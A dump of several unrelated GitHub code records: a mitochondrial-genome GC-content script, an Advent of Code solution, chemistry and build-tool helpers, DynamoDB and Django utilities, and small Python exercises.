\n #Row value= 10 = indicates the nucleotide belongs a non coding region and to a uORF\n #Row value= 11 = indicates the nucleotide belongs a coding region and to a uORF\n #Row value= 12 = indicates the nucleotide belongs a coding region, to a uORF and 2 genes\n #Row value= 22 = indicates the nucleotide belongs a coding region, to 2 uORFs and 2 genes\n #and so on\n #The strip will remove '.\\' that appear on console in Windows 10 before path\\filename \n output_csv_file=open(output_file_name+\".csv\",'w')\n\n return uORFs_file,cds_file,fasta_file,output_gct_file,output_csv_file \n\n\n#This function creates a numerical array (genome_array) which will tell us where the coding, non coding and uORFs are.\n#Based on cds file, the genome_array returned from it contains the data of coding and noncoding regions of genes detailed in GenBank \ndef createGenomeArray(cds_file):\n #genome_array represent the whole genome. Position 0 is not used.\n genome_array=[]\n genome_size=0\n #Loop to get data from cds file\n for line in cds_file: \n #get total genome size from cds file\n if (line.find(\"Genome size: \")!=-1):\n genome_size=int(line[13:]) \n #Instantiate size of genome in genome_array and populates with value=0\n genome_array=[0]*(genome_size+1)\n \n #Get start and end positions of coding regions (genes on cds)\n if (line.find(\";\")!=-1):\n aux_index=line.find(\";\")\n line=line.strip()\n start=int(line[:aux_index])\n end=int(line[aux_index+1:line.find(\"#\")])\n #Loop to register nucleotides that belong to coding regions, based on start and end positions retrieved\n #This adds +1 every time a nucleotide belong to a gene in cds file\n #To contemplate the circular genome, we use a while loop to process every nucleotide in the sequence\n i=start\n while True:\n genome_array[i]=genome_array[i]+1\n if (i==end):\n break\n i=i+1\n #Check if it is the final position of genome and point to the first one\n if (i>len(genome_array)-1):\n i=1\n return genome_size,genome_array\n\ndef checkCG(nc_char):\n if (nc_char=='C' or nc_char=='G'):\n return True\n else:\n return False\n\n#This function calculates the GC content of the coding and non coding regions of a sequence. Using the genome_array as input,\n#its possible to determinte the GC content in coding and non coding regions. \ndef gcContentCalc(start, end, sequence, genome_array):\n #seq_cds store the sequence of nucleotides that are part of the coding region. 
Those nucleotides that are not part of the coding region are replaced by '-'\n seq_cds=\"\"\n #sum_GC_nc store the sum of GC nucleotides in the sequence\n sum_GC_nc=0\n #sum_GC_nc_cds store the sum of GC nucleotides that are part of coding region in the sequence\n sum_GC_nc_cds=0\n #sum_nc_cds store the sum of ALL nucleotides that are part of coding region in the sequence\n sum_nc_cds=0\n #For every nucleotide in the sequence we do a while loop which comtemplate the circular genome\n #Here we have a sequence of interest being compared and saved on seq_cds, because of this we have a second iterator\n i=start\n seq_it=0\n while True:\n if (checkCG(sequence[seq_it])):\n sum_GC_nc=sum_GC_nc+1\n #Check if nucleotide is part of coding region\n #uORFs nucleotides adds +10 to genome_array and gene coding regions derived form cds file adds +1\n #So we get the remainder of division by 10\n if (genome_array[i]%10>0):\n sum_GC_nc_cds= sum_GC_nc_cds+1\n sum_nc_cds=sum_nc_cds+1\n #Add nucleotide to seq_cds\n seq_cds=seq_cds+sequence[seq_it]\n else:\n seq_cds=seq_cds+'-'\n elif (genome_array[i]%10>0):\n sum_nc_cds=sum_nc_cds+1\n #Add nucleotide to seq_cds\n seq_cds=seq_cds+sequence[seq_it]\n else:\n seq_cds=seq_cds+'-'\n #Adding +10 to genome_array will help later check where are the nucleotides that belong to uORFs in csv file\n #Values greater than or equal 10\n genome_array[i]=genome_array[i]+10\n if (i==end):\n break\n i=i+1\n seq_it=seq_it+1\n #Check if 'i' it is the final position of genome and point to the first one\n if (i>len(genome_array)-1):\n i=1\n tam_seq=len(sequence)\n #The next command line returns: proportion of GC nucleotides in the sequence\n #Nucleotides in coding region of the sequence\n #Total of GC nucleotides in the sequence\n #Total of GC nucleotides in the coding region of the sequence\n #Total of nucleotides in the coding region of the sequence\n return seq_cds, sum_GC_nc, sum_GC_nc_cds, sum_nc_cds\n\n\n#This function read the whole genome from fasta file\ndef readWholeGenome(fasta_file):\n #The position 0 of whole_genome will not be used\n whole_genome=\" \"\n for line in fasta_file:\n if(line[0]!=\">\"):\n line=line.upper()\n whole_genome=whole_genome+line.strip()\n fasta_file.close()\n return whole_genome\n\n#Funtion that prints and save on output file the individual ORFs results\ndef printSaveuORFsResults(name_ORF,seq_ORF,sum_ORF_cds,start_ORF,end_ORF,ratio_GC_ORF,ratio_GC_ORF_cds,output_gct_file):\n print(\"____________________________________________________________\")\n print(name_ORF)\n print(\"uORf original sequence:\\n\"+seq_ORF+\"\\nuORF sequence in CDS:\\n\"+sum_ORF_cds)\n print(start_ORF, end_ORF)\n print(\"GC Content of Orf:\",round(ratio_GC_ORF,2))\n print(\"GC Content of Orf in CDS:\",round(ratio_GC_ORF_cds,2))\n output_gct_file.write(name_ORF)\n output_gct_file.write(str(start_ORF)+\",\"+str(end_ORF)+\"\\n\")\n output_gct_file.write(\"uORf original sequence:\\n\"+seq_ORF.rstrip()+\"\\nuORF sequence in CDS:\\n\"+sum_ORF_cds+\"\\n\")\n output_gct_file.write(\"Conteudo GC Orf: \"+str(round(ratio_GC_ORF,2))+\"\\nConteudo GC Orf CDS: \"+str(round(ratio_GC_ORF_cds,2))+\"\\n\\n\")\n\n#Function that reads the uORFs file and calculate GC content for each one of the ORFs listed in it. 
Summary variables are returned as result.\ndef uORFsFileGCCalc(uORFs_file, genome_array, output_gct_file):\n name_ORF=\"\"\n #Total number of GC ORFs nucleotides\n sum_nc_GC_ORFs=0\n #Total number of GC ORFs nucleotides that are part of coding regions\n sum_nc_GC_ORFs_cds=0\n #Total number of ORFs nucleotides\n sum_nc_ORFs=0\n #Total number of ORFs nucleotides in coding regions\n sum_nc_ORFs_cds=0\n for line in uORFs_file:\n if (line.find(\">\")!=-1):\n name_ORF=line[1:]\n elif (line.find(\"+\")!=-1):\n start_ORF=int(line[1:])\n elif (line.find(\"-\")!=-1):\n end_ORF=int(line[1:])\n elif (line.find(\"@\")!=-1):\n seq_ORF=line[1:].upper().strip()\n size_ORF=len(seq_ORF)\n #Call function that calculate GC Content and update genome_array\n sum_ORF_cds, sum_GC_ORF_nc, sum_GC_ORF_nc_cds, sum_ORF_nc_cds=gcContentCalc(start_ORF, end_ORF, seq_ORF, genome_array)\n\n #Ratio_GC_ORF shows the proportion of GC nucleotides of the sequence\n ratio_GC_ORF=sum_GC_ORF_nc/len(seq_ORF)*100\n\n #Ratio_GC_ORF_cds shows the proportion of GC nucleotides in the coding region of the sequence\n ratio_GC_ORF_cds=0\n #Check to avoid division by 0\n if (sum_ORF_nc_cds>0):\n ratio_GC_ORF_cds=sum_GC_ORF_nc_cds/sum_ORF_nc_cds*100\n else:\n ratio_GC_ORF_cds=sum_GC_ORF_nc_cds/1*100\n #Print and save in output files the ORF values\n printSaveuORFsResults(name_ORF, seq_ORF, sum_ORF_cds, start_ORF, end_ORF, ratio_GC_ORF, ratio_GC_ORF_cds, output_gct_file)\n\n sum_nc_GC_ORFs=sum_nc_GC_ORFs + sum_GC_ORF_nc\n sum_nc_GC_ORFs_cds=sum_nc_GC_ORFs_cds + sum_GC_ORF_nc_cds\n sum_nc_ORFs=sum_nc_ORFs+size_ORF\n sum_nc_ORFs_cds=sum_nc_ORFs_cds+sum_ORF_nc_cds\n\n #Return summary values\n return sum_nc_GC_ORFs,sum_nc_GC_ORFs_cds,sum_nc_ORFs,sum_nc_ORFs_cds,sum_nc_ORFs-sum_nc_ORFs_cds\n\n#Print and saves on input file the final summary results\ndef printSaveFinalSummary(genome_size, sum_nc_genome_cds, sum_nc_genome_noncod, sum_GC_nc, sum_GC_nc_cds, sum_GC_nc_noncod, sum_nc_ORFs, sum_nc_GC_ORFs, sum_nc_ORFs_cds, \\\n sum_nc_GC_ORFs_cds, sum_nc_ORFs_noncod, output_gct_file):\n\n print(\"____________________________________________________________\")\n print(\"\\n\")\n print(\"------------------------------------------------------------------------------------------------------------------------------------\")\n print(\"Whole genome total size = \"+str(genome_size)+\" nucleotides, where \"+ str(sum_nc_genome_cds)+\" nucleotides (\"+str(round(sum_nc_genome_cds/genome_size*100,2)) \\\n +\"%) belongs to coding regions (CDS) and \"+ str(sum_nc_genome_noncod)+\" nucleotides (\"+str(round(sum_nc_genome_noncod/genome_size*100,2))+\"%) belongs to non coding regions (NC)\")\n print(\"Whole genome GC content = \"+str(sum_GC_nc)+\" of \"+str(genome_size)+\" nucleotides (\"+str(round(sum_GC_nc/genome_size*100,2))+\"%)\")\n print(\"GC content in coding regions = \"+str(sum_GC_nc_cds)+\" of \"+str(sum_nc_genome_cds)+\" nucleotides (\"+str(round(sum_GC_nc_cds/sum_nc_genome_cds*100,2))+\"%)\")\n print(\"GC content in non coding regions = \"+str(sum_GC_nc_noncod)+\" of \"+str(sum_nc_genome_noncod)+\" nucleotides (\" +str(round(sum_GC_nc_noncod/sum_nc_genome_noncod*100,2))+\"%)\") \n print(\"uORFs total size = \"+ str(sum_nc_ORFs) + \" nucleotides, corresponding to \" + str(round(sum_nc_ORFs/genome_size*100,2))+ \"% \"+\"of whole genome\")\n print(\"uORfs GC content = \" +str(sum_nc_GC_ORFs)+\" of \"+str(sum_nc_ORFs)+\" nucleotides (\"+str(round(sum_nc_GC_ORFs/sum_nc_ORFs*100,2))+\"%)\")\n print(\"uORFs total size in coding regions (CDS) = \"+ 
str(sum_nc_ORFs_cds) + \" of \"+ str(sum_nc_ORFs)+\" nucleotides (\"+str(round(sum_nc_ORFs_cds/sum_nc_ORFs*100,2))+\"%)\")\n print(\"uORFs total size in non coding regions (NC) = \"+ str(sum_nc_ORFs_noncod) + \" of \"+ str(sum_nc_ORFs)+\" nucleotides (\"+str(round(sum_nc_ORFs_noncod/sum_nc_ORFs*100,2))+\"%)\")\n print(\"uORFs GC content in coding regions (CDS) = \" +str(sum_nc_GC_ORFs_cds)+\" of \"+str(sum_nc_ORFs_cds) + \" nucleotides (\"+ str(round(sum_nc_GC_ORFs_cds/sum_nc_ORFs_cds*100,2))+\"%)\")\n #Avoid division by 0\n if (sum_nc_ORFs_noncod!=0):\n print(\"uORFs GC content in non coding regions (NC) = \" +str(sum_nc_GC_ORFs-sum_nc_GC_ORFs_cds)+\" of \"+str(sum_nc_ORFs_noncod) + \" nucleotides (\"+ \\\n str(round((sum_nc_GC_ORFs-sum_nc_GC_ORFs_cds)/(sum_nc_ORFs_noncod)*100,2))+\"%)\")\n else:\n print(\"uORFs GC content in non coding regions (NC) = \" +str(sum_nc_GC_ORFs-sum_nc_GC_ORFs_cds)+\" of \"+str(sum_nc_ORFs_noncod) + \" nucleotides (0%)\")\n print(\"------------------------------------------------------------------------------------------------------------------------------------\")\n\n output_gct_file.write(\"\\n\")\n output_gct_file.write(\"------------------------------------------------------------------------------------------------------------------------------------\\n\")\n output_gct_file.write(\"Whole genome total size = \"+str(genome_size)+\" nucleotides, where \"+ str(sum_nc_genome_cds)+\" nucleotides (\"+str(round(sum_nc_genome_cds/genome_size*100,2)) \\\n +\"%) belongs to coding regions (CDS) and \"+ str(sum_nc_genome_noncod)+\" nucleotides (\"+str(round(sum_nc_genome_noncod/genome_size*100,2))+\"%) belongs to non coding regions (NC)\\n\")\n output_gct_file.write(\"Whole genome GC content = \"+str(sum_GC_nc)+\" of \"+str(genome_size)+\" nucleotides (\"+str(round(sum_GC_nc/genome_size*100,2))+\"%)\\n\")\n output_gct_file.write(\"GC content in coding regions = \"+str(sum_GC_nc_cds)+\" of \"+str(sum_nc_genome_cds)+\" nucleotides (\"+str(round(sum_GC_nc_cds/sum_nc_genome_cds*100,2))+\"%)\\n\")\n output_gct_file.write(\"GC content in non coding regions = \"+str(sum_GC_nc_noncod)+\" of \"+str(sum_nc_genome_noncod)+\" nucleotides (\" +str(round(sum_GC_nc_noncod/sum_nc_genome_noncod*100,2))+\"%)\\n\") \n output_gct_file.write(\"uORFs total size = \"+ str(sum_nc_ORFs) + \" nucleotides, corresponding to \" + str(round(sum_nc_ORFs/genome_size*100,2))+ \"% \"+\"of whole genome\\n\")\n output_gct_file.write(\"uORfs GC content = \" +str(sum_nc_GC_ORFs)+\" of \"+str(sum_nc_ORFs)+\" nucleotides (\"+str(round(sum_nc_GC_ORFs/sum_nc_ORFs*100,2))+\"%)\\n\")\n output_gct_file.write(\"uORFs total size in coding regions (CDS) = \"+ str(sum_nc_ORFs_cds) + \" of \"+ str(sum_nc_ORFs)+\" nucleotides (\"+str(round(sum_nc_ORFs_cds/sum_nc_ORFs*100,2))+\"%)\\n\")\n output_gct_file.write(\"uORFs total size in non coding regions (NC) = \"+ str(sum_nc_ORFs_noncod) + \" of \"+ str(sum_nc_ORFs)+\" nucleotides (\"+str(round(sum_nc_ORFs_noncod/sum_nc_ORFs*100,2))+\"%)\\n\")\n output_gct_file.write(\"uORFs GC content in coding regions (CDS) = \" +str(sum_nc_GC_ORFs_cds)+\" of \"+str(sum_nc_ORFs_cds) + \" nucleotides (\"+ str(round(sum_nc_GC_ORFs_cds/sum_nc_ORFs_cds*100,2))+\"%)\\n\")\n #Avoid division by 0\n if (sum_nc_ORFs_noncod!=0):\n output_gct_file.write(\"uORFs GC content in non coding regions (NC) = \" +str(sum_nc_GC_ORFs-sum_nc_GC_ORFs_cds)+\" of \"+str(sum_nc_ORFs_noncod) + \" nucleotides (\"+ \\\n str(round((sum_nc_GC_ORFs-sum_nc_GC_ORFs_cds)/(sum_nc_ORFs_noncod)*100,2))+\"%)\\n\")\n else:\n 
output_gct_file.write(\"uORFs GC content in non coding regions (NC) = \" +str(sum_nc_GC_ORFs-sum_nc_GC_ORFs_cds)+\" of \"+str(sum_nc_ORFs_noncod) + \" nucleotides (0%)\\n\")\n output_gct_file.write(\"------------------------------------------------------------------------------------------------------------------------------------\\n\")\n\n#Calculate GC content in whole Genome\ndef wholeGenomeGCCalc(output_csv_file,output_gct_file,whole_genome, genome_array):\n #Total of nucleotides in the whole genome that belongs to coding regions\n sum_nc_genome_cds=0\n #Total of nucleotides in the whole genome that belongs to non coding regions\n sum_nc_genome_noncod=0\n #Total of GC nucleotides in the whole genome that belongs to coding regions\n sum_GC_nc_cds=0\n #Total of GC nucleotides in the whole genome\n sum_GC_nc=0\n\n for i in range(1,len(genome_array)):\n output_csv_file.write(str(genome_array[i])+\"\\n\")\n if (checkCG(whole_genome[i])):\n sum_GC_nc=sum_GC_nc+1\n #Check if nucleotide is part of coding region\n #uORFs nucleotides adds +10 to genome_array and gene coding regions derived form cds file adds +1\n #So we get the remainder of division by 10\n if (genome_array[i]%10>0):\n sum_GC_nc_cds= sum_GC_nc_cds+1\n sum_nc_genome_cds=sum_nc_genome_cds+1\n elif (genome_array[i]%10>0):\n sum_nc_genome_cds=sum_nc_genome_cds+1\n\n return sum_nc_genome_cds, sum_GC_nc_cds, sum_GC_nc\n\n\ndef main():\n\n uORFs_file,cds_file,fasta_file,output_gct_file,output_csv_file =checkInputFiles()\n\n #Call function that reads data from 'cds' file, creating genome_array\n genome_size,genome_array = createGenomeArray(cds_file)\n\n #Call function to read whole genome from fasta file\n whole_genome=readWholeGenome(fasta_file)\n\n #Call function to calculate GC Content of uORfs\n sum_nc_GC_ORFs, sum_nc_GC_ORFs_cds, sum_nc_ORFs, sum_nc_ORFs_cds,sum_size_uorfs_noncod=uORFsFileGCCalc(uORFs_file,genome_array,output_gct_file)\n\n #Call function to calculate GC Content of whole genome\n sum_nc_genome_cds, sum_GC_nc_cds, sum_GC_nc=wholeGenomeGCCalc(output_csv_file,output_gct_file, whole_genome, genome_array)\n sum_nc_genome_noncod=genome_size-sum_nc_genome_cds\n sum_GC_nc_noncod=sum_GC_nc-sum_GC_nc_cds\n\n #Calculate number of ORFs nucleotides in non coding regions\n sum_nc_ORFs_noncod=sum_nc_ORFs-sum_nc_ORFs_cds\n \n #Print final summary\n printSaveFinalSummary(genome_size, sum_nc_genome_cds, sum_nc_genome_noncod, sum_GC_nc, sum_GC_nc_cds, sum_GC_nc_noncod, sum_nc_ORFs, sum_nc_GC_ORFs, sum_nc_ORFs_cds, \\\nsum_nc_GC_ORFs_cds, sum_nc_ORFs_noncod, output_gct_file)\n\n print(\"\\n\\n____________________________________________________________\")\n print(\"\\n\\nResults saved in: \"+str(output_gct_file.name)+\" e \"+str(output_csv_file.name)+\"\\n\")\n print(\"____________________________________________________________\\n\\n\\n\")\n\n uORFs_file.close()\n cds_file.close()\n output_csv_file.close()\n output_gct_file.close()\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"paulaluize/mitogenomes","sub_path":"GCContentuORfsCdsCirc.py","file_name":"GCContentuORfsCdsCirc.py","file_ext":"py","file_size_in_byte":19665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"8324209012","text":"from dataclasses import dataclass, field\nimport logging\n\nTEST_INPUT = [\n 'FBFBBFFRLR',\n 'BFFFBBFRRR',\n 'FFFBBBFRRR',\n 'BBFFBBFRLL',\n]\n\nNUM_ROWS = 128\nNUM_COLS = 8\n\ndef divide_seats(string, inc_char, seats):\n offset = 0\n logging.debug(string)\n for char in string:\n seats /= 2\n logging.debug(char)\n if char == inc_char:\n offset += seats\n logging.debug(f' upper half: {offset}, +{seats}')\n else:\n logging.debug(f' lower half: {offset}, +0')\n return int(offset)\n\ndef parse_front_back(string, seats=128):\n return divide_seats(string, 'B', seats)\n\ndef parse_left_right(string, seats=8):\n return divide_seats(string, 'R', seats)\n\ndef decode_seat_code(string: str) -> 'Seat':\n row_code = string[:7]\n column_code = string[7:]\n return Seat(parse_front_back(row_code), parse_left_right(column_code))\n\n@dataclass(frozen=True)\nclass Seat:\n\n row: int\n column: int\n seat_id: int = field(init=False)\n\n def __post_init__(self):\n object.__setattr__(self, 'seat_id', (self.row * 8) + self.column)\n\n\ndef tests():\n print('Tests\\n-----\\n')\n results = [decode_seat_code(code) for code in TEST_INPUT]\n print(results)\n\ndef main():\n print('Main\\n----\\n')\n\n with open(\"input_1.txt\", 'r') as input_file:\n results = [decode_seat_code(code.strip()) for code in input_file.readlines()]\n\n print('Max seat ID: ', max(s.seat_id for s in results))\n \n all_seats = {Seat(row, column) for row in range(NUM_ROWS) for column in range(NUM_COLS)}\n missing_seats = all_seats.difference(results)\n results = sorted(missing_seats, key=lambda e: e.row)\n for r in results:\n print(r)\n\n\nif __name__ == '__main__':\n tests()\n print('')\n main()\n","repo_name":"rpw505/aoc_2020","sub_path":"day_05/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33190270487","text":"import numpy as np\n\nfrom chemtools.wrappers.molecule import Molecule\nfrom chemtools.utils.cube import UniformGrid\n\n\nhelp_cube = \"\"\"\ncubic grid used for evaluation and visualization.\nThis can be either a cube file with .cube extension, or a user-defined\ncubic grid specified by comma-separated spacing and extension values,\ne.g., 0.2,5.0 specifies 0.2 a.u. distance between grid points, and 5.0 a.u.\nextension on each side of molecule. [default=%(default)s]\n\"\"\"\n\n\ndef load_molecule_and_grid(fname, cube):\n \"\"\"Return instances of molecule and uniform cubic grid.\n\n Parameters\n ----------\n fname : str\n Path to wave-function file.\n cube : str\n Uniform cubic grid specifications.\n\n \"\"\"\n # load molecule\n mol = Molecule.from_file(fname)\n\n if cube.endswith(\".cube\"):\n # load & check cube file\n cube = UniformGrid.from_cube(cube)\n if np.allclose(mol.numbers, cube.numbers):\n raise ValueError(\"Atomic number in {0} & {1} should be the same!\".format(fname, cube))\n if np.allclose(mol.coordinates, cube.coordinates):\n raise ValueError(\n \"Atomic coordinates in {0} & {1} should be the same!\".format(cube.fname, cube.cube)\n )\n elif len(cube.split(\",\")) == 2:\n # make a cubic grid\n spacing, extension = [float(item) for item in cube.split(\",\")]\n cube = UniformGrid.from_molecule(mol, spacing=spacing, extension=extension, rotate=True)\n\n else:\n raise ValueError(\"Argument cube={0} is not recognized!\".format(cube))\n\n return mol, cube\n","repo_name":"theochem/chemtools","sub_path":"chemtools/scripts/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"}
+{"seq_id":"32795615141","text":"def _compile_single(ctx):\n yasm_path = \"yasm \"\n args = []\n\n if ctx.attr.arch == \"x64\":\n args += [\"-felf64\", \"-D__x86_64__\", \"-DELF\"]\n else:\n args += [\"-felf\", \"-D__x86__\", \"-DELF\"]\n\n args += ctx.attr.defines\n\n include_paths = []\n include_paths += [\"-I./\" + e.path for e in ctx.files.includes]\n args += include_paths\n args += [ctx.file.src.path]\n args += [\"-o \", ctx.outputs.out.path]\n\n command = yasm_path + \" \".join(args)\n ctx.action(\n mnemonic = \"YasmCompile\",\n inputs = [ctx.file.src] + ctx.files.deps,\n outputs = [ctx.outputs.out],\n command = command,\n )\n\n return struct(files = set([ctx.outputs.out]))\n\n_yasm_compile_attrs = {\n \"src\": attr.label(allow_files = FileType([\".asm\"]),\n single_file = True),\n \"arch\": attr.string(default = \"x64\"),\n \"includes\": attr.label_list(allow_files = True),\n \"deps\": attr.label_list(allow_files = True),\n \"defines\": attr.string_list(),\n}\n\nyasm_compile = rule(\n _compile_single,\n attrs = _yasm_compile_attrs,\n outputs = {\n \"out\": \"%{name}.o\"\n }\n)\n\ndef yasm_library(name, arch=None, srcs=None, deps=[], includes=[], defines=[], visibility=None):\n yasm_objs = []\n for src in srcs:\n yasm_objs += [yasm_compile(name = src[:-4],\n arch = arch,\n src = src,\n deps = deps,\n includes = includes,\n defines = defines)]\n lablels = [e.label() for e in yasm_objs]\n native.cc_library(\n linkstatic = 1,\n name = name,\n visibility = visibility,\n srcs = lablels\n )\n \n\n\n","repo_name":"baranov1ch/squim","sub_path":"tools/build_rules/yasm.bzl","file_name":"yasm.bzl","file_ext":"bzl","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"19882638668","text":"import subprocess\n\nif __name__ == \"__main__\":\n command = input(\"Introduceti comanda: \")\n command_list = []\n\n for c in command.split(\"|\"):\n command_list.append(filter(lambda c: c != \"\", c.split(\" \")))\n\n prev = subprocess.run(command_list[0], stdout=subprocess.PIPE)\n\n for c in command_list[1:]:\n prev = subprocess.run(c, input=prev.stdout, stdout=subprocess.PIPE)\n\n print(f'{prev.stdout.decode(\"utf-8\")}')\n","repo_name":"Eduard975/PP","sub_path":"Teme/Tema11/Problema2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"31103900998","text":"# Print the following pattern for the given number of rows.\n# Assume N is always odd.\n# Note : There is space after every star.\n# Pattern for N = 7\n# *\n# * *\n# * * *\n# * * * *\n# * * *\n# * *\n# *\n\n\nn=int(input())\nn1=(n//2)+1\ni=1\nwhile i<=n1:\n spaces=i-1\n while spaces>=1:\n print(\" \",end=\"\")\n spaces-=1\n star=1\n while star<=i:\n print(\"* \",end=\"\")\n star +=1\n print()\n i=i+1\nn2=n//2\ni=1\nwhile i<=n2:\n spaces=n2-i\n while spaces>=1:\n print(\" \",end=\"\")\n spaces-=1\n star=n2-i+1\n while star>=1:\n print(\"* \",end=\"\")\n star-=1\n print()\n i=i+1\n","repo_name":"LORDFLACKO0087/Python-Codes","sub_path":"Coding Ninjas/Patterns 2/Arrow pattern.py","file_name":"Arrow pattern.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"38821540585","text":"import boto3\nfrom botocore.exceptions import ClientError\nimport os\nimport json\nfrom decimal import Decimal\nfrom pprint import pprint\nfrom loguru import logger\n\ndynamodb = boto3.resource('dynamodb', endpoint_url=\"http://localhost:8000\")\n\n\ndef load_data(devices, dynamodb=None):\n devices_table = dynamodb.Table('Devices')\n # Loop through all the items and load each\n for device in devices:\n device_id = (device['device_id'])\n datacount = device['datacount']\n # Print device info\n print(\"Loading Devices Data:\", device_id, datacount)\n devices_table.put_item(Item=device)\n\n\ndef create_devices_table(dynamodb=None):\n dynamodb = boto3.resource(\n 'dynamodb', endpoint_url=\"http://localhost:8000\")\n # Table defination\n table = dynamodb.create_table(\n TableName='Devices',\n KeySchema=[\n {\n 'AttributeName': 'device_id',\n 'KeyType': 'HASH' # Partition key\n },\n {\n 'AttributeName': 'datacount',\n 'KeyType': 'RANGE' # Sort key\n }\n ],\n AttributeDefinitions=[\n {\n 'AttributeName': 'device_id',\n # AttributeType defines the data type. 'S' is string type and 'N' is number type\n 'AttributeType': 'S'\n },\n {\n 'AttributeName': 'datacount',\n 'AttributeType': 'N'\n },\n ],\n ProvisionedThroughput={\n # ReadCapacityUnits set to 10 strongly consistent reads per second\n 'ReadCapacityUnits': 10,\n 'WriteCapacityUnits': 10 # WriteCapacityUnits set to 10 writes per second\n }\n )\n return table\n\n\ndef create_user_table():\n table_name = 'Users'\n params = {\n 'TableName': table_name,\n 'KeySchema': [\n {'AttributeName': 'partition_key', 'KeyType': 'HASH'},\n {'AttributeName': 'sort_key', 'KeyType': 'RANGE'}\n ],\n 'AttributeDefinitions': [\n {'AttributeName': 'partition_key', 'AttributeType': 'N'},\n {'AttributeName': 'sort_key', 'AttributeType': 'N'}\n ],\n 'ProvisionedThroughput': {\n 'ReadCapacityUnits': 10,\n 'WriteCapcityUnits': 10\n },\n }\n table = dynamodb.create_table(**params)\n logger.info(f\"Creating table: {table_name}\")\n table.wait_until_exists()\n return table\n\n\ndef put_device(device_id, datacount, timestamp, temperature1, temperature2, temperature3, temperature4, temperature5, dynamodb=None):\n dynamodb = boto3.resource(\n 'dynamodb', endpoint_url=\"http://localhost:8000\")\n # Specify the table\n devices_table = dynamodb.Table('Devices')\n response = devices_table.put_item(\n # Data to be inserted\n Item={\n 'device_id': device_id,\n 'datacount': datacount,\n 'info': {\n 'info_timestamp': timestamp,\n 'temperature1': temperature1,\n 'temperature2': temperature2,\n 'temperature3': temperature3,\n 'temperature4': temperature4,\n 'temperature5': temperature5\n }\n }\n )\n return response\n\n\ndef get_device(device_id, datacount):\n # Specify the table to read from\n devices_table = dynamodb.Table('Devices')\n\n try:\n response = devices_table.get_item(\n Key={'device_id': device_id, 'datacount': datacount})\n except ClientError as e:\n print(e.response['Error']['Message'])\n else:\n return response['Item']\n\n\ndef scan_devices():\n dynamodb = boto3.resource(\n 'dynamodb', endpoint_url=\"http://localhost:8000\")\n # Specify the table to scan\n devices_table = dynamodb.Table('Devices')\n response = devices_table.scan()\n print(response)\n items = response['Items']\n while 'LastEvaluatedKey' in response:\n print(response['LastEvaluatedKey'])\n response = devices_table.scan(ExclusiveStartKey=response['LastEvaluatedKey'])\n items.extend(response['Items'])\n print(items)\n\n\nif __name__ == '__main__':\n # device_table = 
create_devices_table()\n # Print table status\n # print(\"Status:\", device_table.table_status)\n\n # with open(\"../data.json\") as json_file:\n # device_list = json.load(json_file, parse_float=Decimal)\n # load_data(device_list)\n\n # device_resp = put_device(\"10001\", 3, \"1612522800\",\n # \"23.74\", \"32.56\", \"12.43\", \"44.74\", \"12.74\")\n # print(\"Create item successful.\")\n # # Print response\n # pprint(device_resp)\n\n device = get_device(\"10001\", 3, )\n if device:\n print(\"Get Device Data Done:\")\n # Print the data read\n print(device)\n\n # scan_devices()\n\n","repo_name":"bwlee13/ProjectInit","sub_path":"utils/db_utils.py","file_name":"db_utils.py","file_ext":"py","file_size_in_byte":4787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"27212945163","text":"from django.conf import settings\nfrom django.core.management import call_command\nfrom django.db.models import loading\nfrom django import test\n\n\nclass TestCase(test.TestCase):\n apps = ('flash.tests',)\n tables_created = False\n\n def _pre_setup(self):\n cls = TestCase\n if not cls.tables_created:\n # Add the models to the db.\n cls._original_installed_apps = list(settings.INSTALLED_APPS)\n for app in cls.apps:\n if isinstance(settings.INSTALLED_APPS, tuple):\n settings.INSTALLED_APPS = list(settings.INSTALLED_APPS)\n settings.INSTALLED_APPS.append(app)\n loading.cache.loaded = False\n call_command('syncdb', interactive=False, verbosity=0)\n TestCase.tables_created = True\n\n # Call the original method that does the fixtures etc.\n super(TestCase, self)._pre_setup()\n\n def _post_teardown(self):\n # Call the original method.\n super(TestCase, self)._post_teardown()\n cls = TestCase\n # Restore the settings.\n settings.INSTALLED_APPS = cls._original_installed_apps\n loading.cache.loaded = False\n","repo_name":"HackerEarth/django-flash","sub_path":"flash/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"25407513960","text":"from model import Compra, Cartao, CompraCredito\nfrom datetime import datetime, date\n\nvisa = Cartao('1111 1111 1111 1111', date(2031, 1, 31), '321', 1000.0, 'Steve Rogers')\n\ncompra_farmacia = Compra(100.0, datetime(2023, 1, 1, 10, 0, 0), 'Farmácia Popular', 'Saúde', visa)\ncompra_restaurante = Compra(89.9, datetime(2023, 1, 2, 12, 15, 0), 'Burguer King', 'Lazer', visa)\ncompra_supermercado = Compra(475.5, datetime(2023, 2, 3, 7, 5, 5), 'Carrefour', 'Alimentação', visa)\n\nprint(compra_farmacia)\nprint(compra_restaurante)\nprint(compra_supermercado)\nprint()\n\ncompra_amazon = CompraCredito(1000.0, datetime(2023, 2, 15, 19, 46, 17), 'Amazon', 'Casa', visa, 10)\nprint(f'Compra a crédito: {compra_amazon.valor} em {compra_amazon.quantidade_parcelas}x de {compra_amazon.valor_parcela}')\nprint()\n\nfatura = [compra_farmacia, compra_restaurante, compra_supermercado, compra_amazon]\ntotal = 0\nfor compra in fatura:\n total += compra.valor\n\nprint(f'O total da fatura é: 